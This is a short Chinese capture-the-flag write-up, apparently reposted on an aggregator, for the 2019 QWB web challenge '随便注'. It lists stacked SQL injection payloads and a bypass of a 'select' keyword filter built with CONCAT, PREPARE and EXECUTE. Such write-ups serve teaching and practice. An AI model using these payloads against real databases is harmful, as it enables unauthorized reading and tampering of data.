Web-[强网杯 2019]随便注 - 润新知

Web-[强网杯 2019]随便注
打开题目：

应该是道sql注入题
先尝试payload:' or 1=1#

判断存在sql注入

查询数据库1';show databases#

查询表1';show tables#

查询字段,表名为数字时要用引号圈起来
```
1';select * from `1919810931114514`#
```
发现select被过滤了

设置payload:
```
?inject=-1';SET @sql = CONCAT('sel','ect',' * from `1919810931114514`;');PREPARE dawn from @sql;EXECUTE dawn;#
```
得到flag
相关阅读:
Python Module_Socket_网络编程
 Python Module_Socket_网络编程
 从 2017 OpenStack Days China 看国内云计算的发展现状
 从 2017 OpenStack Days China 看国内云计算的发展现状
 说说excel
一种防脱裤撞库的可能性？
黑白相片变彩色相片的一种可能性？
为什么需求文档一定要电子化？
一个网页布局练习
 css田字格布局
原文地址：https://www.cnblogs.com/1dan/p/15525019.html

Copyright © 2020-2023 润新知